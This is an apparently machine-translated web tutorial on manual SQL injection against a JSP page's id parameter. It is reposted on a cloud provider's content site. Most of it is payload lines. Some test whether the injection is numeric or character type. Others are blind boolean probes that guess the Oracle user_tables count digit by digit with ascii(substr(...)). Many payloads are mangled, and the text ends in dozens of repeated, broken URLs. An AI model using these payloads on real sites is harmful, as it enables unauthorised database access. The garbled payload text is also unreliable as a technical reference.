JSP Manual Injection __jsp

Source: Internet
Author: User
1, to determine the type of injection (digital or character)
Character and digital data judgments: (I hope someone can further refine, subdivided into digital and character-type judgments in two parts)
and User>char (0)
and user http://www.test.net/index_kaoyan_view.jsp?id=117 ' and User>char (0) and ' 1 ' = ' 1
' and Userchar (0) and '%25 ' = '
' and Userchar (0) and (') = ('
') and user http://www.test.net/index_kaoyan_view.jsp?id=117 and Str (>STR) (97)
and STR (98)

' and STR (>STR) and ' 1 ' = ' 1
' Str ' and '%25 ' = '

 

' and user http://www.test.net/index_kaoyan_view.jsp?id=117 ' and str str (') ' = ('
") and STR (98)

The normal page appears:
and USER>CHR (0)
and USER

2, guess the number of tables and table name

Number of databases is 3:
and 0<=nvl ((SELECT COUNT (*) from User_tables), 0)

and 1>=nvl ((SELECT COUNT (*) from User_tables), 0)

and 2<=nvl ((SELECT COUNT (*) from User_tables), 0)

and 4>=nvl ((SELECT COUNT (*) from User_tables), 0)

and 3=nvl ((SELECT COUNT (*) from User_tables), 0)

and Unistr (1) >unistr (0)

The following is the number of guessing data tables
The First Data table is: 1

and 52=ascii (substr (SELECT COUNT (*) from User_tables), 1, 1)
and 52>ascii (substr (SELECT COUNT (*) from User_tables), 1, 1)

and 49=ascii (substr (SELECT COUNT (*) from User_tables), 1, 1)


The second digit of the data table is: 3
and 49=ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 95=ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 77=ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)
and 77>ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 70=ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 70>ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 67=ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 67>ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 65=ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 65>ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 109=ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 109>ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 102=ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 102>ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 99=ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 99>ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 97=ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 97>ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 53=ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 53>ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

and 51=ascii (substr (SELECT COUNT (*) from User_tables), 2, 1)

The third digit of the data table is: 1
and 51=ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 95=ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 77=ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 77>ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 70=ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 70>ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 67=ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 67>ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 65=ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 65>ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 109=ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 109>ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 102=ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 102>ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 102>ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 99=ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 99>ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 97=ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 97>ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 54=ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 54>ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 52=ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 52>ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 52>ascii (substr (SELECT COUNT (*) from User_tables), 3, 1)

and 49=ascii (substr (SELECT COUNT (*) from User_tables), 3,1) http://www.test.net/index_kaoyan_view.jsp?id=117 http:/ /www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/ index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 Http://www.test.net/index_kaoyan_ view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id= 117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http:// www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/ index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 Http://www.test.net/index_kaoyan_ view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id= 117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/ index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 Http://www.test.net/index_kaoyan_ view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id= 117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http:// www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/ index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 Http://www.test.net/index_kaoyan_ view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id= 117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http:// www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/ Index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 Http://www.test.net/index_kaoyan_ view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id= 117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http:// www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/ index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 Http://www.test.net/index_kaoyan_ view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id= 117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http:// www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/ index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 Http://www.test.net/index_kaoyan_ View.jsp?id=1http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http:// www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/ index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 Http://www.test.net/index_kaoyan_ view.jsp?id=117
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.